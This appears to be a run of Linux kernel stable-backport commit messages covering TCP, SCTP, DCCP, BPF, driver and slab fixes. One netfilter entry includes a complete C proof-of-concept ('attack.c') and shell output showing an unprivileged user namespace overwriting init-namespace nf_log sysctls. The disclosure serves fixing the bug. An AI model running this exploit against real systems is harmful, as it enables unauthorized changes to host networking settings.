Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 849c498766 ]
If the number of pages we are flushing is more than twice the number
of entries in the TSB, just scan the TSB table for matches rather
than probing each and every page in the range.
Based upon a patch and report by James Clarke.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9d9fa23020 ]
Additionally, if the offset will overflow the immediate for a ba,pt
instruction, fall back on a standard ba to get an extra 3 bits.
Signed-off-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8736f8022e upstream.
spidev.h uses _IOC_SIZEBITS directly. musl libc does not provide this macro
unless linux/ioctl.h is included explicitly. Fixes build failures like:
In file included from .../host/usr/arm-buildroot-linux-musleabihf/sysroot/usr/include/sys/ioctl.h:7:0,
from .../build/spidev_test-v3.15/spidev_test.c:20:
.../build/spidev_test-v3.15/spidev_test.c: In function ‘transfer’:
.../build/spidev_test-v3.15/spidev_test.c:75:18: error: ‘_IOC_SIZEBITS’ undeclared (first use in this function)
ret = ioctl(fd, SPI_IOC_MESSAGE(1), &tr);
^
Signed-off-by: Baruch Siach <baruch@tkos.co.il>
Signed-off-by: Mark Brown <broonie@kernel.org>
Cc: Ralph Sennhauser <ralph.sennhauser@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit c51e424dc7 ]
Commit 52f95bbfcf ("stmmac: fix adjust link call in case of a switch
is attached") added some logic to avoid polling the fixed PHY and
therefore invoking the adjust_link callback more than once, since this
is a fixed PHY and link events won't be generated.
This works fine the first time, because we start with phydev->irq =
PHY_POLL, so we call adjust_link, then we set phydev->irq =
PHY_IGNORE_INTERRUPT and we stop polling the PHY.
Now, if we called ndo_close(), which calls both phy_stop() and does an
explicit netif_carrier_off(), we end up with a link down. Upon calling
ndo_open() again, despite starting the PHY state machine, we have
PHY_IGNORE_INTERRUPT set, and we generate no link event at all, so the
link is permanently down.
Fixes: 52f95bbfcf ("stmmac: fix adjust link call in case of a switch is attached")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Acked-by: Giuseppe Cavallaro <peppe.cavallaro@st.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 5bf35ddfee ]
Now when users shutdown a sock with SEND_SHUTDOWN in sctp, even if
this sock has no connection (assoc), sk state would be changed to
SCTP_SS_CLOSING, which is not as we expect.
Besides, after that if users try to listen on this sock, kernel
could even panic when it dereference sctp_sk(sk)->bind_hash in
sctp_inet_listen, as bind_hash is null when sock has no assoc.
This patch is to move sk state change after checking sk assocs
is not empty, and also merge these two if() conditions and reduce
indent level.
Fixes: d46e416c11 ("sctp: sctp should change socket state when shutdown is received")
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 6df77862f6 ]
In-flight DMA from 1st kernel could continue going in kdump kernel.
New io-page table has been created before bnx2 does reset at open stage.
We have to wait for the in-flight DMA to complete to avoid it look up
into the newly created io-page table at probe stage.
Suggested-by: Michael Chan <michael.chan@broadcom.com>
Signed-off-by: Baoquan He <bhe@redhat.com>
Acked-by: Michael Chan <michael.chan@broadcom.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 5d0d4b91bf ]
This reverts commit 3e1be7ad2d.
When people build bnx2 driver into kernel, it will fail to detect
and load firmware because firmware is contained in initramfs and
initramfs has not been uncompressed yet during do_initcalls. So
revert commit 3e1be7a and work out a new way in the later patch.
Signed-off-by: Baoquan He <bhe@redhat.com>
Acked-by: Paul Menzel <pmenzel@molgen.mpg.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 42cdb338f4 ]
The device's neighbour table is periodically dumped in order to update
the kernel about active neighbours. A single dump session may span
multiple queries, until the response carries less records than requested
or when a record (can contain up to four neighbour entries) is not full.
Current code stops the session when the number of returned records is
zero, which can result in infinite loop in case of high packet rate.
Fix this by stopping the session according to the above logic.
Fixes: c723c735fa ("mlxsw: spectrum_router: Periodically update the kernel's neigh table")
Signed-off-by: Arkadi Sharshevsky <arkadis@mellanox.com>
Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 2d644d4c75 ]
When binding port to a newly created span entry, its refcount is
initialized to zero even though it has a bound port. That leads
to unexpected behaviour when the user tries to delete that port
from the span entry.
Fix this by initializing the reference count to 1.
Also add a warning to put function.
Fixes: 763b4b70af ("mlxsw: spectrum: Add support in matchall mirror TC offloading")
Signed-off-by: Yotam Gigi <yotamg@mellanox.com>
Reviewed-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 7b5b74efcc ]
This reverts commit cf00713a65 ("include/uapi/linux/atm_zatm.h: include
linux/time.h").
This attempted to fix userspace breakage that no longer existed when
the patch was merged. Almost one year earlier, commit 70ba07b675
("atm: remove 'struct zatm_t_hist'") deleted the struct in question.
After this patch was merged, we now have to deal with people being
unable to include this header in conjunction with standard C library
headers like stdlib.h (which linux-atm does). Example breakage:
x86_64-pc-linux-gnu-gcc -DHAVE_CONFIG_H -I. -I../.. -I./../q2931 -I./../saal \
-I. -DCPPFLAGS_TEST -I../../src/include -O2 -march=native -pipe -g \
-frecord-gcc-switches -freport-bug -Wimplicit-function-declaration \
-Wnonnull -Wstrict-aliasing -Wparentheses -Warray-bounds \
-Wfree-nonheap-object -Wreturn-local-addr -fno-strict-aliasing -Wall \
-Wshadow -Wpointer-arith -Wwrite-strings -Wstrict-prototypes -c zntune.c
In file included from /usr/include/linux/atm_zatm.h:17:0,
from zntune.c:17:
/usr/include/linux/time.h:9:8: error: redefinition of ‘struct timespec’
struct timespec {
^
In file included from /usr/include/sys/select.h:43:0,
from /usr/include/sys/types.h:219,
from /usr/include/stdlib.h:314,
from zntune.c:9:
/usr/include/time.h:120:8: note: originally defined here
struct timespec
^
Signed-off-by: Mike Frysinger <vapier@gentoo.org>
Acked-by: Mikko Rapeli <mikko.rapeli@iki.fi>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ac6e780070 ]
With syzkaller help, Marco Grassi found a bug in TCP stack,
crashing in tcp_collapse()
Root cause is that sk_filter() can truncate the incoming skb,
but TCP stack was not really expecting this to happen.
It probably was expecting a simple DROP or ACCEPT behavior.
We first need to make sure no part of TCP header could be removed.
Then we need to adjust TCP_SKB_CB(skb)->end_seq
Many thanks to syzkaller team and Marco for giving us a reproducer.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Marco Grassi <marco.gra@gmail.com>
Reported-by: Vladis Dronov <vdronov@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 969447f226 ]
In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().
After commit 5943634fc5 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never gets resolved and the traffic is blackholed.
So, use the new_gw for neigh lookup.
Changes from v1:
- use __ipv4_neigh_lookup instead (per Eric Dumazet).
Fixes: 5943634fc5 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 34fad54c25 ]
After Tom patch, thoff field could point past the end of the buffer,
this could fool some callers.
If an skb was provided, skb->len should be the upper limit.
If not, hlen is supposed to be the upper limit.
Fixes: a6e544b0a8 ("flow_dissector: Jump to exit code in __skb_flow_dissect")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Yibin Yang <yibyang@cisco.com
Acked-by: Alexander Duyck <alexander.h.duyck@intel.com>
Acked-by: Willem de Bruijn <willemb@google.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9d1a6c4ea4 ]
icmp_send is called in response to some event. The skb may not have
the device set (skb->dev is NULL), but it is expected to have an rt.
Update icmp_route_lookup to use the rt on the skb to determine L3
domain.
Fixes: 613d09b30f ("net: Use VRF device index for lookups on TX")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 3023898b7d ]
Do not send the next message in sendmmsg for partial sendmsg
invocations.
sendmmsg assumes that it can continue sending the next message
when the return value of the individual sendmsg invocations
is positive. It results in corrupting the data for TCP,
SCTP, and UNIX streams.
For example, sendmmsg([["abcd"], ["efgh"]]) can result in a stream
of "aefgh" if the first sendmsg invocation sends only the first
byte while the second sendmsg goes through.
Datagram sockets either send the entire datagram or fail, so
this patch affects only sockets of type SOCK_STREAM and
SOCK_SEQPACKET.
Fixes: 228e548e60 ("net: Add sendmmsg socket system call")
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit fd0285a39b ]
The display of /proc/net/route has had a couple issues due to the fact that
when I originally rewrote most of fib_trie I made it so that the iterator
was tracking the next value to use instead of the current.
In addition it had an off by 1 error where I was tracking the first piece
of data as position 0, even though in reality that belonged to the
SEQ_START_TOKEN.
This patch updates the code so the iterator tracks the last reported
position and key instead of the next expected position and key. In
addition it shifts things so that all of the leaves start at 1 instead of
trying to report leaves starting with offset 0 as being valid. With these
two issues addressed this should resolve any off by one errors that were
present in the display of /proc/net/route.
Fixes: 25b97c016b ("ipv4: off-by-one in continuation handling in /proc/net/route")
Cc: Andy Whitcroft <apw@canonical.com>
Reported-by: Jason Baron <jbaron@akamai.com>
Tested-by: Jason Baron <jbaron@akamai.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 5d41ce29e3 ]
icmp6_send is called in response to some event. The skb may not have
the device set (skb->dev is NULL), but it is expected to have a dst set.
Update icmp6_send to use the dst on the skb to determine L3 domain.
Fixes: ca254490c8 ("net: Add VRF support to IPv6 stack")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 483bed2b0d ]
Commit a6ed3ea65d ("bpf: restore behavior of bpf_map_update_elem")
added an extra per-cpu reserve to the hash table map to restore old
behaviour from pre prealloc times. When non-prealloc is in use for a
map, then problem is that once a hash table extra element has been
linked into the hash-table, and the hash table is destroyed due to
refcount dropping to zero, then htab_map_free() -> delete_all_elements()
will walk the whole hash table and drop all elements via htab_elem_free().
The problem is that the element from the extra reserve is first fed
to the wrong backend allocator and eventually freed twice.
Fixes: a6ed3ea65d ("bpf: restore behavior of bpf_map_update_elem")
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 7233bc84a3 ]
sctp_wait_for_connect() currently already holds the asoc to keep it
alive during the sleep, in case another thread release it. But Andrey
Konovalov and Dmitry Vyukov reported an use-after-free in such
situation.
Problem is that __sctp_connect() doesn't get a ref on the asoc and will
do a read on the asoc after calling sctp_wait_for_connect(), but by then
another thread may have closed it and the _put on sctp_wait_for_connect
will actually release it, causing the use-after-free.
Fix is, instead of doing the read after waiting for the connect, do it
before so, and avoid this issue as the socket is still locked by then.
There should be no issue on returning the asoc id in case of failure as
the application shouldn't trust on that number in such situations
anyway.
This issue doesn't exist in sctp_sendmsg() path.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 1aa9d1a0e7 ]
dccp_v6_err() does not use pskb_may_pull() and might access garbage.
We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 6706a97fec ]
dccp_v4_err() does not use pskb_may_pull() and might access garbage.
We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.
This patch might allow to process more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of extended lengths (RFC 1812 4.3.2.3)
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 79d8665b95 ]
After my commit, tcp_sendmsg() might restart its loop after
processing socket backlog.
If sk_err is set, we blindly return an error, even though we
copied data to user space before.
We should instead return number of bytes that could be copied,
otherwise user space might resend data and corrupt the stream.
This might happen if another thread is using recvmsg(MSG_ERRQUEUE)
to process timestamps.
Issue was diagnosed by Soheil and Willem, big kudos to them !
Fixes: d41a69f1d3 ("tcp: make tcp_sendmsg() aware of socket backlog")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Cc: Soheil Hassas Yeganeh <soheil@google.com>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
Tested-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9ee6c5dc81 ]
Some configurations (e.g. geneve interface with default
MTU of 1500 over an ethernet interface with 1500 MTU) result
in the transmission of packets that exceed the configured MTU.
While this should be considered to be a "bad" configuration,
it is still allowed and should not result in the sending
of packets that exceed the configured MTU.
Fix by dropping the assumption in ip_finish_output_gso() that
locally originated gso packets will never need fragmentation.
Basic testing using iperf (observing CPU usage and bandwidth)
have shown no measurable performance impact for traffic not
requiring fragmentation.
Fixes: c7ba65d7b6 ("net: ip: push gso skb forwarding handling down the stack")
Reported-by: Jan Tluka <jtluka@redhat.com>
Signed-off-by: Lance Richardson <lrichard@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ac9e70b17e ]
Imagine initial value of max_skb_frags is 17, and last
skb in write queue has 15 frags.
Then max_skb_frags is lowered to 14 or smaller value.
tcp_sendmsg() will then be allowed to add additional page frags
and eventually go past MAX_SKB_FRAGS, overflowing struct
skb_shared_info.
Fixes: 5f74f82ea3 ("net:Add sysctl_max_skb_frags")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Hans Westgaard Ry <hans.westgaard.ry@oracle.com>
Cc: Håkon Bugge <haakon.bugge@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 23f4ffedb7 ]
skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.
This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.
Cc: stable@vger.kernel.org
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit fcdefccac9 ]
Current bgmac code initializes some DMA settings in the receive control
register for some hardware and then immediately clears those settings.
Not clearing those settings results in ~420Mbps *improvement* in
throughput; this system can now receive frames at line-rate on Broadcom
5871x hardware compared to ~520Mbps today. I also tested a few other
values but found there to be no discernible difference in CPU
utilization even if burst size and prefetching values are different.
On the hardware tested there was no need to keep the code that cleared
all but bits 16-17, but since there is a wide variety of hardware that
used this driver (I did not look at all hardware docs for hardware using
this IP block), I find it wise to move this call up and clear bits just
after reading the default value from the hardware rather than completely
removing it.
This is a good candidate for -stable >=3.14 since that is when the code
that was supposed to improve performance (but did not) was introduced.
Signed-off-by: Andy Gospodarek <gospo@broadcom.com>
Fixes: 56ceecde1f ("bgmac: initialize the DMA controller of core...")
Cc: Hauke Mehrtens <hauke@hauke-m.de>
Acked-by: Hauke Mehrtens <hauke@hauke-m.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 4f2e4ad56a ]
Sending zero checksum is ok for TCP, but not for UDP.
UDPv6 receiver should by default drop a frame with a 0 checksum,
and UDPv4 would not verify the checksum and might accept a corrupted
packet.
Simply replace such checksum by 0xffff, regardless of transport.
This error was caught on SIT tunnels, but seems generic.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e551c32d57 ]
At accept() time, it is possible the parent has a non zero
sk_err_soft, leftover from a prior error.
Make sure we do not leave this value in the child, as it
makes future getsockopt(SO_ERROR) calls quite unreliable.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ce6dd23329 ]
If a congestion control module doesn't provide .undo_cwnd function,
tcp_undo_cwnd_reduction() will set cwnd to
tp->snd_cwnd = max(tp->snd_cwnd, tp->snd_ssthresh << 1);
... which makes sense for reno (it sets ssthresh to half the current cwnd),
but it makes no sense for dctcp, which sets ssthresh based on the current
congestion estimate.
This can cause severe growth of cwnd (eventually overflowing u32).
Fix this by saving last cwnd on loss and restore cwnd based on that,
similar to cubic and other algorithms.
Fixes: e3118e8359 ("net: tcp: add DCTCP congestion control algorithm")
Cc: Lawrence Brakmo <brakmo@fb.com>
Cc: Andrew Shewmaker <agshew@gmail.com>
Cc: Glenn Judd <glenn.judd@morganstanley.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dbb5918cb3 upstream.
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;
void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}
int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");
/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);
stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}
int main(void) {
outer_uid = getuid();
outer_gid = getgid();
int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");
char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fd58753ead upstream.
Currently the display INIT power domain disabling/enabling happens in a
mismatched way in the suspend/resume_early hooks respectively. This can
leave display power wells incorrectly disabled in the resume hook if the
suspend sequence is aborted for some reason resulting in the
suspend/resume hooks getting called but the suspend_late/resume_early
hooks being skipped. In particular this change fixes "Unclaimed read
from register 0x1e1204" on BYT/BSW triggered from i915_drm_resume()->
intel_pps_unlock_regs_wa() when suspending with /sys/power/pm_test set
to devices.
Fixes: 85e9067933 ("drm/i915: disable power wells on suspend")
Cc: Ville Syrjälä <ville.syrjala@linux.intel.com>
Cc: David Weinehall <david.weinehall@intel.com>
Signed-off-by: Imre Deak <imre.deak@intel.com>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1476358446-11621-1-git-send-email-imre.deak@intel.com
(cherry picked from commit 4c494a5769)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0f10425e81 upstream.
To free fences, call_rcu() is used, which calls amdgpu_fence_free()
after a grace period. During teardown, there is no guarantee all
callbacks have finished, so amdgpu_fence_slab may be destroyed before
all fences have been freed. If we are lucky, this results in some slab
warnings, if not, we get a crash in one of rcu threads because callback
is called after amdgpu has already been unloaded.
Fix it with a rcu_barrier().
Fixes: b44135351a ("drm/amdgpu: RCU protected amdgpu_fence_release")
Acked-by: Chunming Zhou <david1.zhou@amd.com>
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Grazvydas Ignotas <notasas@gmail.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 68a564006a upstream.
A bugfix introduced a harmless gcc warning in nfs4_slot_seqid_in_use
if we enable -Wmaybe-uninitialized again:
fs/nfs/nfs4session.c:203:54: error: 'cur_seq' may be used uninitialized in this function [-Werror=maybe-uninitialized]
gcc is not smart enough to conclude that the IS_ERR/PTR_ERR pair
results in a nonzero return value here. Using PTR_ERR_OR_ZERO()
instead makes this clear to the compiler.
The warning originally did not appear in v4.8 as it was globally
disabled, but the bugfix that introduced the warning got backported
to stable kernels which again enable it, and this is now the only
warning in the v4.7 builds.
Fixes: e09c978aae ("NFSv4.1: Fix Oopsable condition in server callback races")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Cc: Trond Myklebust <trond.myklebust@primarydata.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3890dce1d3 upstream.
If your data pool was pool 0, ceph_file_layout_from_legacy()
transform that to -1 unconditionally, which broke upgrades.
We only want do that for a fully zeroed ceph_file_layout,
so that it still maps to a file_layout_t. If any fields
are set, though, we trust the fl_pgpool to be a valid pool.
Fixes: 7627151ea3 ("libceph: define new ceph_file_layout structure")
Link: http://tracker.ceph.com/issues/17825
Signed-off-by: Yan, Zheng <zyan@redhat.com>
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f773e36de3 upstream.
While testing OBJFREELIST_SLAB integration with pagealloc, we found a
bug where kmem_cache(sys) would be created with both CFLGS_OFF_SLAB &
CFLGS_OBJFREELIST_SLAB. When it happened, critical allocations needed
for loading drivers or creating new caches will fail.
The original kmem_cache is created early making OFF_SLAB not possible.
When kmem_cache(sys) is created, OFF_SLAB is possible and if pagealloc
is enabled it will try to enable it first under certain conditions.
Given kmem_cache(sys) reuses the original flag, you can have both flags
at the same time resulting in allocation failures and odd behaviors.
This fix discards allocator specific flags from memcg before calling
create_cache.
The bug exists since 4.6-rc1 and affects testing debug pagealloc
configurations.
Fixes: b03a017beb ("mm/slab: introduce new slab management type, OBJFREELIST_SLAB")
Link: http://lkml.kernel.org/r/1478553075-120242-1-git-send-email-thgarnie@google.com
Signed-off-by: Greg Thelen <gthelen@google.com>
Signed-off-by: Thomas Garnier <thgarnie@google.com>
Tested-by: Thomas Garnier <thgarnie@google.com>
Acked-by: Christoph Lameter <cl@linux.com>
Cc: Pekka Enberg <penberg@kernel.org>
Cc: David Rientjes <rientjes@google.com>
Cc: Joonsoo Kim <iamjoonsoo.kim@lge.com>
Cc: Vladimir Davydov <vdavydov.dev@gmail.com>
Cc: Michal Hocko <mhocko@kernel.org>
Cc: Johannes Weiner <hannes@cmpxchg.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f91346e8b5 upstream.
An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.
In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.
Fixes: e4243f13d1 (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Reviewed-by: Marek Vasut <marex@denx.de>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 091c531b09 upstream.
Since commit 44a7185c2a ("of/platform: Add common method to populate
default bus"), ARM64 platform devices are populated at the
arch_initcall_sync level; as a result, the platform_driver_probe calls
in both the iProc and NSP GPIO drivers fail with -ENODEV since by that
time the platform device was not yet registered.
Replace platform_driver_probe with platform_driver_register, that allow
the device to be register later
Fixes: 44a7185c2a ("of/platform: Add common method to populate default bus")
Signed-off-by: Ray Jui <ray.jui@broadcom.com>
Tested-by: Eric Anholt <eric@anholt.net>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 85915b63ad upstream.
When sun4i_codec_create_card fails, we do not assign a proper error
code to the return value. The return value would be 0 from the previous
function call, or we would have bailed out sooner. This would confuse
the driver core into thinking the device probe succeeded, when in fact
it didn't, leaving various devres based resources lingering.
Make the create_card function pass back a meaningful error code, and
assign it to the return value.
